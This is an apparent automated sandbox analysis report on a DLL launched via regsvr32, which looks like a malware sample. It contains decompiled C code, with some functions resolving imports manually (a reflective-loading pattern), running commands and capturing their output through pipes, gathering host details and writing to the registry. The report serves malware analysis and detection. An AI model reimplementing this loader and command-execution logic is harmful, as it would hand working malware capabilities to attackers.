                            						while( *_t29 == 0x30) {
                            							_t29 = _t29 + 1;
                            						}
                            						if(_t29 != _t45) {
                            							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                            							_t40 = _t40 + _t45 - _t29;
                            						}
                            						goto L18;
                            					} else {
                            						_t6 = _t40 + 3; // 0x100109b2
                            						_t12 = _t6;
                            						if(_t12 >= _a8) {
                            							goto L19;
                            						}
                            						_t26[_t40] = 0x302e;
                            						( &(_t26[2]))[_t40] = 0;
                            						_t40 = _t40 + 2;
                            						goto L11;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                            • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                            • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                            				char _v516;
                            				void _v1044;
                            				char _v1076;
                            				signed int _v1080;
                            				signed int _v1096;
                            				WCHAR* _v1100;
                            				intOrPtr _v1104;
                            				signed int _v1108;
                            				intOrPtr _v1112;
                            				intOrPtr _v1116;
                            				char _v1144;
                            				char _v1148;
                            				void* __esi;
                            				intOrPtr _t66;
                            				intOrPtr _t73;
                            				signed int _t75;
                            				intOrPtr _t76;
                            				signed int _t81;
                            				WCHAR* _t87;
                            				void* _t89;
                            				signed int _t90;
                            				signed int _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				WCHAR* _t96;
                            				intOrPtr _t106;
                            				intOrPtr _t107;
                            				void* _t108;
                            				intOrPtr _t109;
                            				signed char _t116;
                            				WCHAR* _t118;
                            				void* _t122;
                            				signed int _t123;
                            				intOrPtr _t125;
                            				void* _t128;
                            				void* _t129;
                            				WCHAR* _t130;
                            				void* _t134;
                            				void* _t141;
                            				void* _t143;
                            				WCHAR* _t145;
                            				signed int _t153;
                            				void* _t154;
                            				void* _t178;
                            				signed int _t180;
                            				void* _t181;
                            				void* _t183;
                            				void* _t187;
                            				signed int _t188;
                            				WCHAR* _t190;
                            				signed int _t191;
                            				signed int _t192;
                            				intOrPtr* _t194;
                            				signed int _t196;
                            				void* _t199;
                            				void* _t200;
                            				void* _t201;
                            				void* _t202;
                            				intOrPtr* _t203;
                            				void* _t208;
                            
                            				_t208 = __fp0;
                            				_push(_t191);
                            				_t128 = __edx;
                            				_t187 = __ecx;
                            				_t192 = _t191 | 0xffffffff;
                            				memset( &_v1044, 0, 0x20c);
                            				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                            				_v1108 = 1;
                            				if(_t187 != 0) {
                            					_t123 =  *0x1001e688; // 0x2d90590
                            					_t125 =  *0x1001e68c; // 0x2e0fc68
                            					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                            				}
                            				if(E1000BB8D(_t187) != 0) {
                            					L4:
                            					_t134 = _t128;
                            					_t66 = E1000B7A8(_t134,  &_v516);
                            					_push(_t134);
                            					_v1104 = _t66;
                            					E1000B67D(_t66,  &_v1076, _t206, _t208);
                            					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                            					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                            					E1000B88A(_t141,  &_v1100, _t208);
                            					_t175 =  &_v1076;
                            					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                            					_v1112 = _t73;
                            					_t143 = _t141;
                            					if(_t73 != 0) {
                            						_push(0);
                            						_push(_t129);
                            						_push("\\");
                            						_t130 = E100092E5(_t73);
                            						_t200 = _t199 + 0x10;
                            						_t75 =  *0x1001e688; // 0x2d90590
                            						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                            							L12:
                            							__eflags = _v1108;
                            							if(__eflags != 0) {
                            								_t76 = E100091E3(_v1112);
                            								_t145 = _t130;
                            								 *0x1001e740 = _t76;
                            								 *0x1001e738 = E100091E3(_t145);
                            								L17:
                            								_push(_t145);
                            								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                            								_t201 = _t200 + 0x10;
                            								__eflags = _t188;
                            								if(_t188 == 0) {
                            									goto L41;
                            								}
                            								_push(0x1001b9ca);
                            								E10009F48(0xe);
                            								E10009F6C(_t188, _t208, _t130);
                            								_t194 = _a4;
                            								_v1096 = _v1096 & 0x00000000;
                            								_push(2);
                            								_v1100 =  *_t194;
                            								_push(8);
                            								_push( &_v1100);
                            								_t178 = 0xb;
                            								E1000A0AB(_t188, _t178, _t208);
                            								_t179 =  *(_t194 + 0x10);
                            								_t202 = _t201 + 0xc;
                            								__eflags =  *(_t194 + 0x10);
                            								if( *(_t194 + 0x10) != 0) {
                            									E1000A3ED(_t188, _t179, _t208);
                            								}
                            								_t180 =  *(_t194 + 0xc);
                            								__eflags = _t180;
                            								if(_t180 != 0) {
                            									E1000A3ED(_t188, _t180, _t208);
                            								}
                            								_t87 = E1000980C(0);
                            								_push(2);
                            								_v1100 = _t87;
                            								_t153 = _t188;
                            								_push(8);
                            								_v1096 = _t180;
                            								_push( &_v1100);
                            								_t181 = 2;
                            								_t89 = E1000A0AB(_t153, _t181, _t208);
                            								_t203 = _t202 + 0xc;
                            								__eflags = _v1108;
                            								if(_v1108 == 0) {
                            									_t153 =  *0x1001e688; // 0x2d90590
                            									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                            										_t203 = _t203 + 0xc;
                            										goto L26;
                            									}
                            									_t153 = _t153 + 0x228;
                            									goto L25;
                            								} else {
                            									_t91 =  *0x1001e688; // 0x2d90590
                            									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										L32:
                            										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                            										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                            											_t183 = 0x64;
                            											E1000E23E(_t183);
                            										}
                            										E100052C0( &_v1076, _t208);
                            										_t190 = _a8;
                            										_t154 = _t153;
                            										__eflags = _t190;
                            										if(_t190 != 0) {
                            											_t94 =  *0x1001e688; // 0x2d90590
                            											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                            											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                            												lstrcpyW(_t190, _t130);
                            											} else {
                            												_t96 = E1000109A(_t154, 0x228);
                            												_v1100 = _t96;
                            												lstrcpyW(_t190, _t96);
                            												E100085D5( &_v1100);
                            												 *_t203 = "\"";
                            												lstrcatW(_t190, ??);
                            												lstrcatW(_t190, _t130);
                            												lstrcatW(_t190, "\"");
                            											}
                            										}
                            										_t93 = _a12;
                            										__eflags = _t93;
                            										if(_t93 != 0) {
                            											 *_t93 = _v1104;
                            										}
                            										_t192 = 0;
                            										__eflags = 0;
                            										goto L41;
                            									}
                            									_t51 = _t91 + 0x228; // 0x2d907b8
                            									_t153 = _t51;
                            									L25:
                            									_t90 = E1000553F(_t153, _t130, __eflags);
                            									L26:
                            									__eflags = _t90;
                            									if(_t90 >= 0) {
                            										_t91 =  *0x1001e688; // 0x2d90590
                            										goto L32;
                            									}
                            									_push(0xfffffffd);
                            									L6:
                            									_pop(_t192);
                            									goto L41;
                            								}
                            							}
                            							_t106 = E1000C292(_v1104, __eflags);
                            							_v1112 = _t106;
                            							_t107 =  *0x1001e684; // 0x2e0faa0
                            							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                            							__eflags = _t108 - _t192;
                            							if(_t108 != _t192) {
                            								_t109 =  *0x1001e684; // 0x2e0faa0
                            								 *((intOrPtr*)(_t109 + 0x30))();
                            								E1000861A( &_v1148, _t192);
                            								_t145 = _t108;
                            								goto L17;
                            							}
                            							E1000861A( &_v1144, _t192);
                            							_t81 = 1;
                            							goto L42;
                            						}
                            						_t116 =  *(_t75 + 0x1898);
                            						__eflags = _t116 & 0x00000004;
                            						if((_t116 & 0x00000004) == 0) {
                            							__eflags = _t116;
                            							if(_t116 != 0) {
                            								goto L12;
                            							}
                            							L11:
                            							E1000E286(_v1112, _t175);
                            							goto L12;
                            						}
                            						_v1080 = _v1080 & 0x00000000;
                            						_t118 = E100095E1(_t143, 0x879);
                            						_v1100 = _t118;
                            						_t175 = _t118;
                            						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                            						E100085D5( &_v1100);
                            						_t200 = _t200 + 0x14;
                            						goto L11;
                            					}
                            					_push(0xfffffffe);
                            					goto L6;
                            				} else {
                            					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                            					_t206 = _t122;
                            					if(_t122 == 0) {
                            						L41:
                            						_t81 = _t192;
                            						L42:
                            						return _t81;
                            					}
                            					goto L4;
                            				}
                            			}
                            0x10004d0e
                            0x10004d13
                            0x10004d1b
                            0x10004d1f
                            0x10004d2a
                            0x10004d35
                            0x10004d3d
                            0x10004d41
                            0x10004d49
                            0x10004d49
                            0x10004d0c
                            0x10004d55
                            0x10004d58
                            0x10004d5a
                            0x10004d60
                            0x10004d60
                            0x10004d62
                            0x10004d62
                            0x00000000
                            0x10004d62
                            0x10004c9a
                            0x10004c9a
                            0x10004ca0
                            0x10004ca2
                            0x10004ca7
                            0x10004ca7
                            0x10004ca9
                            0x10004cd8
                            0x00000000
                            0x10004cd8
                            0x10004cab
                            0x10004ae4
                            0x10004ae4
                            0x00000000
                            0x10004ae4
                            0x10004c8a
                            0x10004b69
                            0x10004b77
                            0x10004b8a
                            0x10004b8f
                            0x10004b95
                            0x10004b97
                            0x10004baf
                            0x10004bb4
                            0x10004bbd
                            0x10004bc3
                            0x00000000
                            0x10004bc3
                            0x10004b9f
                            0x10004ba8
                            0x00000000
                            0x10004ba8
                            0x10004b0b
                            0x10004b11
                            0x10004b13
                            0x10004b51
                            0x10004b53
                            0x00000000
                            0x00000000
                            0x10004b55
                            0x10004b59
                            0x00000000
                            0x10004b59
                            0x10004b15
                            0x10004b1f
                            0x10004b2b
                            0x10004b36
                            0x10004b3d
                            0x10004b47
                            0x10004b4c
                            0x00000000
                            0x10004b4c
                            0x10004ae2
                            0x00000000
                            0x10004a66
                            0x10004a71
                            0x10004a77
                            0x10004a79
                            0x10004d64
                            0x10004d64
                            0x10004d66
                            0x10004d6c
                            0x10004d6c
                            0x00000000
                            0x10004a79

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                            • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                            • SysAllocString.OLEAUT32(?), ref: 1000D764
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                            • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                            • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                            • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E100121FF(char* __eax, char** _a4, long long* _a8) {
                            				char* _v8;
                            				long long _v16;
                            				char* _t9;
                            				signed char _t11;
                            				char** _t19;
                            				char _t22;
                            				long long _t32;
                            				long long _t33;
                            
                            				_t9 = __eax;
                            				L100122CD();
                            				_t19 = _a4;
                            				_t22 =  *__eax;
                            				if( *_t22 != 0x2e) {
                            					_t9 = strchr( *_t19, 0x2e);
                            					if(_t9 != 0) {
                            						 *_t9 =  *_t22;
                            					}
                            				}
                            				L10012291();
                            				 *_t9 =  *_t9 & 0x00000000;
                            				_t11 = strtod( *_t19,  &_v8);
                            				asm("fst qword [ebp-0xc]");
                            				_t32 =  *0x10018250;
                            				asm("fucomp st1");
                            				asm("fnstsw ax");
                            				if((_t11 & 0x00000044) != 0) {
                            					L5:
                            					st0 = _t32;
                            					L10012291();
                            					if( *_t11 != 0x22) {
                            						_t33 = _v16;
                            						goto L8;
                            					} else {
                            						return _t11 | 0xffffffff;
                            					}
                            				} else {
                            					_t33 =  *0x10018258;
                            					asm("fucomp st1");
                            					asm("fnstsw ax");
                            					if((_t11 & 0x00000044) != 0) {
                            						L8:
                            						 *_a8 = _t33;
                            						return 0;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                            • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E1000CF84(void* __ecx) {
                            				intOrPtr _t11;
                            				long _t12;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				struct _OSVERSIONINFOA* _t29;
                            
                            				_push(__ecx);
                            				_t29 =  *0x1001e688; // 0x2d90590
                            				GetCurrentProcess();
                            				_t11 = E1000BA05();
                            				_t1 = _t29 + 0x1644; // 0x2d91bd4
                            				_t25 = _t1;
                            				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                            				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                            				_t33 = _t12;
                            				if(_t12 != 0) {
                            					_t12 = E10008FBE(_t25, _t33);
                            				}
                            				_t3 = _t29 + 0x228; // 0x2d907b8
                            				 *(_t29 + 0x1854) = _t12;
                            				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                            				memset(_t29, 0, 0x9c);
                            				_t29->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t29);
                            				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                            				_t17 = E1000E3B6(_t3);
                            				_t7 = _t29 + 0x220; // 0x2d907b0
                            				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                            				_t18 = E1000E3F1(_t7);
                            				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                            				return _t18;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,02D90590,?,10003545), ref: 1000CF90
                            • GetModuleFileNameW.KERNEL32(00000000,02D91BD4,00000105,?,?,02D90590,?,10003545), ref: 1000CFB1
                            • memset.MSVCRT ref: 1000CFE2
                            • GetVersionExA.KERNEL32(02D90590,02D90590,?,10003545), ref: 1000CFED
                            • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                            • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E1000A9B7(signed int __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				struct _SECURITY_ATTRIBUTES _v48;
                            				intOrPtr _v60;
                            				char _v64;
                            				intOrPtr _v76;
                            				intOrPtr _v80;
                            				void* _v84;
                            				short _v92;
                            				intOrPtr _v96;
                            				void _v140;
                            				intOrPtr _t77;
                            				void* _t79;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				intOrPtr _t92;
                            				intOrPtr _t98;
                            				intOrPtr _t100;
                            				intOrPtr _t102;
                            				long _t111;
                            				intOrPtr _t115;
                            				intOrPtr _t126;
                            				void* _t127;
                            				void* _t128;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t111 = 0;
                            				_v24 = __ecx;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_t127 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v48.nLength = 0xc;
                            				_v48.lpSecurityDescriptor = 0;
                            				_v48.bInheritHandle = 1;
                            				_v28 = 0;
                            				memset( &_v140, 0, 0x44);
                            				asm("stosd");
                            				_t130 = _t129 + 0xc;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                            					L18:
                            					return 0;
                            				}
                            				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                            					L13:
                            					E1000861A( &_v28, 0);
                            					if(_v20 != 0) {
                            						_t77 =  *0x1001e684; // 0x2e0faa0
                            						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                            					}
                            					if(_v8 != 0) {
                            						_t115 =  *0x1001e684; // 0x2e0faa0
                            						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                            					}
                            					return _t111;
                            				}
                            				_t79 = _v16;
                            				_v76 = _t79;
                            				_v80 = _t79;
                            				_v84 = _v12;
                            				_v140 = 0x44;
                            				_v96 = 0x101;
                            				_v92 = 0;
                            				_t126 = E10008604(0x1001);
                            				_v28 = _t126;
                            				if(_t126 == 0) {
                            					goto L18;
                            				}
                            				_push( &_v64);
                            				_push( &_v140);
                            				_t85 =  *0x1001e684; // 0x2e0faa0
                            				_push(0);
                            				_push(0);
                            				_push(0x8000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push(_v24);
                            				_push(0);
                            				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                            					goto L13;
                            				}
                            				_t87 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                            				_t89 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                            				_v24 = _v24 & 0;
                            				do {
                            					_t92 =  *0x1001e684; // 0x2e0faa0
                            					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                            					 *((char*)(_v24 + _t126)) = 0;
                            					if(_t111 == 0) {
                            						_t127 = E100091A6(_t126, 0);
                            					} else {
                            						_push(0);
                            						_push(_t126);
                            						_v32 = _t127;
                            						_t127 = E10009292(_t127);
                            						E1000861A( &_v32, 0xffffffff);
                            						_t130 = _t130 + 0x14;
                            					}
                            					_t111 = _t127;
                            					_v32 = _t127;
                            				} while (_v36 != 0);
                            				_push( &_v36);
                            				_push(E1000C379(_t127));
                            				_t98 =  *0x1001e68c; // 0x2e0fc68
                            				_push(_t127);
                            				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                            					L12:
                            					_t100 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                            					_t102 =  *0x1001e684; // 0x2e0faa0
                            					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                            					goto L13;
                            				}
                            				_t128 = E10009256(_t127);
                            				if(_t128 == 0) {
                            					goto L12;
                            				}
                            				E1000861A( &_v32, 0);
                            				return _t128;
                            			}

                            APIs
                            • memset.MSVCRT ref: 1000A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                            • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocFreememset
                            • String ID: D
                            • API String ID: 488076629-2746444292
                            • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                            • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E1001249B(signed int __eax, intOrPtr _a4) {
                            				intOrPtr* _v8;
                            				signed int* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				struct HINSTANCE__* _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _t109;
                            				signed int _t112;
                            				signed int _t115;
                            				void* _t163;
                            
                            				_v44 = _v44 & 0x00000000;
                            				if(_a4 != 0) {
                            					_v48 = GetModuleHandleA("kernel32.dll");
                            					_v40 = E1000E099(_v48, "GetProcAddress");
                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            					_v32 = _v52;
                            					_t109 = 8;
                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                            						L24:
                            						return 0;
                            					}
                            					_v56 = 0x80000000;
                            					_t112 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v8 = _v8 + 0x14;
                            					}
                            					_t115 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                            						if(_v36 != 0) {
                            							if( *_v8 == 0) {
                            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                            							} else {
                            								_v12 =  *_v8 + _a4;
                            							}
                            							_v28 = _v28 & 0x00000000;
                            							while( *_v12 != 0) {
                            								_v24 = _v24 & 0x00000000;
                            								_v16 = _v16 & 0x00000000;
                            								_v64 = _v64 & 0x00000000;
                            								_v20 = _v20 & 0x00000000;
                            								if(( *_v12 & _v56) == 0) {
                            									_v60 =  *_v12 + _a4;
                            									_v20 = _v60 + 2;
                            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                            									_v16 = _v40(_v36, _v20);
                            								} else {
                            									_v24 =  *_v12;
                            									_v20 = _v24 & 0x0000ffff;
                            									_v16 = _v40(_v36, _v20);
                            								}
                            								if(_v24 != _v16) {
                            									_v44 = _v44 + 1;
                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                            										 *_v12 = _v16;
                            									} else {
                            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                            									}
                            								}
                            								_v12 =  &(_v12[1]);
                            								_v28 = _v28 + 4;
                            							}
                            							_v8 = _v8 + 0x14;
                            							continue;
                            						}
                            						_t163 = 0xfffffffd;
                            						return _t163;
                            					}
                            					goto L24;
                            				}
                            				return __eax | 0xffffffff;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
